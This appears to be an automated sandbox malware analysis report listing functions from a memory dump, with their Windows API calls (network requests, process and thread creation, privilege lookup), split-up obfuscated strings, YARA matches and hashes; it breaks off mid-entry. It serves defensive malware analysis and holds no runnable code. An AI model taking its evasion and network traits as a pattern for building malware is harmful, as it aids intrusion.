                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4e3ae612edf9ad3085d4903949562cbf0aae04d968e8a5cb06abdcc3399245db
                                                                  • Instruction ID: 90cbee3c76cb36f0b982b24d8c0df4b0b23ff62130821d74c460b6178370596d
                                                                  • Opcode Fuzzy Hash: 4e3ae612edf9ad3085d4903949562cbf0aae04d968e8a5cb06abdcc3399245db
                                                                  • Instruction Fuzzy Hash: 9590027120118802F110715DC404B4A004597E0345F55C525E441565CD86D5D8917161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 87dcb50bce8b161542efe4e60de351addee7597a162dfb4a4fac605c949a147c
                                                                  • Instruction ID: 68c1d09bd9d83fe5123538b975a3995b23f55bcf1d36cd25bf2ddaafd53a07f9
                                                                  • Opcode Fuzzy Hash: 87dcb50bce8b161542efe4e60de351addee7597a162dfb4a4fac605c949a147c
                                                                  • Instruction Fuzzy Hash: 4090027120514842F140715D8404E46005597E0349F51C125E0055698D9665DD55B6A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 12a6852be0ef9dcb2b16ff13a2b212a0f37a4c3469dd7e59fea2ef68dcc7105d
                                                                  • Instruction ID: 8ef76914256137b95d60aa9d7905bd7e5f81e4f65fcdf906aa7a83815ba4212d
                                                                  • Opcode Fuzzy Hash: 12a6852be0ef9dcb2b16ff13a2b212a0f37a4c3469dd7e59fea2ef68dcc7105d
                                                                  • Instruction Fuzzy Hash: 7990026121190042F200756D8C14F07004597E0347F51C229E0145558CC955D8616561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 19ef0d05c6e6c5eaf630cc0feb795805d7ef6064326f9c9a0daaa26862ce6920
                                                                  • Instruction ID: 6a25918d02b57291f7f6d35cfcad1a915e71a6a2f2487475d9a0ecb540a8440e
                                                                  • Opcode Fuzzy Hash: 19ef0d05c6e6c5eaf630cc0feb795805d7ef6064326f9c9a0daaa26862ce6920
                                                                  • Instruction Fuzzy Hash: C890027120110802F180715D8404A4A004597E1345F91C129E0016658DCA55DA5977E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: d8f4787e07e7fb27965df63126efe2daab4f2bdb74059aa3bf888753773d264b
                                                                  • Instruction ID: ab884cceb0a7ffb7102dcf9881bf797794d6a994c77fabffa11e7219c2f409ba
                                                                  • Opcode Fuzzy Hash: d8f4787e07e7fb27965df63126efe2daab4f2bdb74059aa3bf888753773d264b
                                                                  • Instruction Fuzzy Hash: E890026921310002F180715D9408A0A004597E1246F91D529E000655CCC955D8696361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3002326393df32ae3b6e8519de5203171aa0f898c37007c7690837fdeeaae593
                                                                  • Instruction ID: f3c21abd3c1c4948ee9dcf4896b147de22d60d69142e7080b134b2045a20dd4d
                                                                  • Opcode Fuzzy Hash: 3002326393df32ae3b6e8519de5203171aa0f898c37007c7690837fdeeaae593
                                                                  • Instruction Fuzzy Hash: 0290027131124402F110715DC404B06004597E1245F51C525E081555CD86D5D8917162
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8db3e28c5d4b4a5b8b7eeb289fc0f1c4b9ea6695603162385a7394baa9afff41
                                                                  • Instruction ID: def0652aca834ed9fac9f39a3bf441a7b9608db155a1fe4711d9b119e6a6578c
                                                                  • Opcode Fuzzy Hash: 8db3e28c5d4b4a5b8b7eeb289fc0f1c4b9ea6695603162385a7394baa9afff41
                                                                  • Instruction Fuzzy Hash: 1A90027120110402F100759D9408A46004597F0345F51D125E5015559EC6A5D8917171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128835, Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 75networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 03128827
                                                                  • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 031288A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$ConnectOpen
                                                                  • String ID: A$Conn$ConnectA$Inte$InternetConnectA$InternetOpenA$Open$ectA$rnet$rnet$rnetConnectA$rnetOpenA
                                                                  • API String ID: 2790792615-965392731
                                                                  • Opcode ID: 598e58b2cbbe39c01ce48ec9b020531ce13bda433bfd0ea4ae3ebc5932be4997
                                                                  • Instruction ID: 5471b55eac671143b0304e4f1429240acb04ba75914de533b1733d765c8ff43d
                                                                  • Opcode Fuzzy Hash: 598e58b2cbbe39c01ce48ec9b020531ce13bda433bfd0ea4ae3ebc5932be4997
                                                                  • Instruction Fuzzy Hash: E9210EB2905129AFCB14DF99D9409EFBBB9EF48310F158189FD08A7245D734AE20CBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031288C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 03128928
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HttpOpenRequest
                                                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                  • API String ID: 1984915467-4016285707
                                                                  • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                  • Instruction ID: f531e5fdbc3ada6330e9c9a5866cd996eec7465f91e549c025341f79637e9b4f
                                                                  • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                  • Instruction Fuzzy Hash: A101E9B2905159AFCB14DF99D841DEF7BB9EB48210F158288FD48A7204D730ED10CBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031288B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 44networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 03128928
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HttpOpenRequest
                                                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                  • API String ID: 1984915467-4016285707
                                                                  • Opcode ID: 07fb383177fc999c31967b497e24831440bbdae0b4e8140c0ea61e73a96b75b8
                                                                  • Instruction ID: ba9a899794f1fb5201d14508cbfac04698df924b6eebee0ce38e638629ae0589
                                                                  • Opcode Fuzzy Hash: 07fb383177fc999c31967b497e24831440bbdae0b4e8140c0ea61e73a96b75b8
                                                                  • Instruction Fuzzy Hash: E20129B2904218AFCB14DF88C881DEF7BB9EB48210F158248FD58AB304D730EA10CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128940, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0312899C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HttpRequestSend
                                                                  • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                  • API String ID: 360639707-2503632690
                                                                  • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                  • Instruction ID: 78d8b3137e9e83e60c01f8e38b8fa0bf87e85c5b53c8244a1ffee3850219e33c
                                                                  • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                  • Instruction Fuzzy Hash: F901FFB2905119AFCB14DF99D8459AFBBB8EB58210F158199FD18A7204D670EE10CBE2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128937, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 40networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0312899C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HttpRequestSend
                                                                  • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                  • API String ID: 360639707-2503632690
                                                                  • Opcode ID: 68cf9eea73360423d406100efa7cf64b625a0f15d787a05f6689290a0e9e3ff0
                                                                  • Instruction ID: 5e5ded71870881511db2311a4bdef1753eb82d46457265498e76332b84c80c91
                                                                  • Opcode Fuzzy Hash: 68cf9eea73360423d406100efa7cf64b625a0f15d787a05f6689290a0e9e3ff0
                                                                  • Instruction Fuzzy Hash: B7014FB1905159AFCB15CF98C845AEFBFB8EF59210F158158FD59AB204C330EA20CBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 031288A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConnectInternet
                                                                  • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                  • API String ID: 3050416762-1024195942
                                                                  • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                  • Instruction ID: 501cab8665f3f4788bffbf0b492d90ed6f63e62ca6d2fcc28b6b0f167f8aaf79
                                                                  • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                  • Instruction Fuzzy Hash: 7601E9B2915118AFCB14DF99D941EEFBBB9EB48210F154289BE08A7240D630EE10CBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031287D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 03128827
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InternetOpen
                                                                  • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                  • API String ID: 2038078732-3155091674
                                                                  • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                  • Instruction ID: 1b3a7b65b0dd9db090ab1fe558003c6c5161f6de2e8643400dff052b9ded498e
                                                                  • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                  • Instruction Fuzzy Hash: 6AF01DB6901128AF8B14DF98DC419EBB7B8FF48310F048589BD1897205D730AA20CBE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03126ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 03126F78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                  • Instruction ID: 7e741c4c480a163b23034a90c372608c8e943d4366fdb965b9abab31f25ea51d
                                                                  • Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                  • Instruction Fuzzy Hash: 133170B5601704ABC715DF68CCB0FA7BBB8AF48700F04841DF61A9B281D774B565CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03126EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 03126F78
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 773297fbeba254c78f64aaec3a3caef1b24d059031365fcfda9f5b2ffd52c9f5
                                                                  • Instruction ID: 430b8e9c9064453a4a75fa9b747d15d6ddaa4313a88cf98ab38057fab8f07b14
                                                                  • Opcode Fuzzy Hash: 773297fbeba254c78f64aaec3a3caef1b24d059031365fcfda9f5b2ffd52c9f5
                                                                  • Instruction Fuzzy Hash: 1721D2B5601340ABCB15DF68CCA0FA6BBB4AF4C700F04805DF6299F281D374A461CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031284C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03113B93), ref: 031284ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: .z`
                                                                  • API String ID: 3298025750-1441809116
                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                  • Instruction ID: 7b1e697a9c2c4dd6a5739564e865bc78ccb56cffb3bc4205bc840e87bc65af38
                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                  • Instruction Fuzzy Hash: EEE012B6200218ABDB18EF99CC48EA777ACAF88650F018558BA085B241DA30E9148AF0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03117260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 031172BA
                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 031172DB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                  • Instruction ID: 98531724e0841aed15da61a322967468d9a4ac8e3a4af34fdc6914ff460508ca
                                                                  • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                  • Instruction Fuzzy Hash: 2D01A775A803287BE720E6949C02FFEB76C5B08B51F540125FF04BE1C1E794691646F5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031285C6, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0311CF92,0311CF92,?,00000000,?,?), ref: 03128650
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 9d411ef627f42058858285df9f96cfc7290e1974aef4e4e686c5baeac1ad12bb
                                                                  • Instruction ID: 0f81165cb52bc1dc2c5aea3b77e7b78fd37139c6b99462bb38d1b357a1c0a189
                                                                  • Opcode Fuzzy Hash: 9d411ef627f42058858285df9f96cfc7290e1974aef4e4e686c5baeac1ad12bb
                                                                  • Instruction Fuzzy Hash: 270121B62002186FDB14DF58DC84EEB77A9EF89254F158154FA0D6B741DA30E815CBF1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03119B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03119B82
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction ID: 252d63e5d9493b46b9ef7165b91bd912cb9d65d778a91f58d03f4593e2503759
                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction Fuzzy Hash: 97011EB9D4020DABDF10EAE4DC51FDEB7789F58208F0481A5E9189B240FB31EB24CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03128584
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                  • Instruction ID: 5ba159dff4509b900786e9d0772449c72f325e3f84d3e942e5f3722621a07295
                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                  • Instruction Fuzzy Hash: 6101AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240D630E851CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0312852D, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03128584
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: dd2f6cde7d7e14b342fd8fc09afc10a4396a03d7eb87d511cd6beb548af90eeb
                                                                  • Instruction ID: 889b8d3828f01cf8170661bbd1c4be7e78cec28f3b0e716d8b3d5a5e1935b27a
                                                                  • Opcode Fuzzy Hash: dd2f6cde7d7e14b342fd8fc09afc10a4396a03d7eb87d511cd6beb548af90eeb
                                                                  • Instruction Fuzzy Hash: 0101AFB6200108AFCB54CF89DC90EEB3BB9AF8C354F158258FA4D97240C630E851CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03127000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0311CCC0,?,?), ref: 0312703C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                  • Instruction ID: 9d7cdd1a6025c32e814e66a8375ada0fb35cccb0eb8094093254a197dbd3807c
                                                                  • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                  • Instruction Fuzzy Hash: 43E092373803143BE330A599AC02FE7B79CCB85B20F540026FA0DEB2C1D695F81142A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03126FF4, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0311CCC0,?,?), ref: 0312703C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 72779bc6a4a0c4295cc1debfb06396f9303ce9d25983f629e59fb3c839cd80dd
                                                                  • Instruction ID: e6cf97f3fc1621d1e31acf97281540b65a3b266a08b1a1c9f23008917bf3c5cf
                                                                  • Opcode Fuzzy Hash: 72779bc6a4a0c4295cc1debfb06396f9303ce9d25983f629e59fb3c839cd80dd
                                                                  • Instruction Fuzzy Hash: 2DF0927B7813103AE335A5589C03FD7BB5D8B99B11F180019F649BF3C1D6A4F91642A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128611, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0311CF92,0311CF92,?,00000000,?,?), ref: 03128650
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: f298077f5b5e730a0f4d8485c8762f187cc94733b3d3ad8f990b95339f9a8d97
                                                                  • Instruction ID: 9b35a20336571fc9f4fc33f87a5eed4033da3a27d781501a95a8ed0801757be4
                                                                  • Opcode Fuzzy Hash: f298077f5b5e730a0f4d8485c8762f187cc94733b3d3ad8f990b95339f9a8d97
                                                                  • Instruction Fuzzy Hash: 5BE06DB5600219ABDB10DF64CC80EEB77A9EF88354F058195FE086B242DA34A865CBF4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0311CF92,0311CF92,?,00000000,?,?), ref: 03128650
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                  • Instruction ID: e7f66466bba180bd32d6d8cd2b2a85d4e9a76e07cc8d266ffd297dd9972a5f38
                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                  • Instruction Fuzzy Hash: F6E01AB52002186BDB10DF49CC84EE737ADAF88650F018154BA085B241DA30E8148BF5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
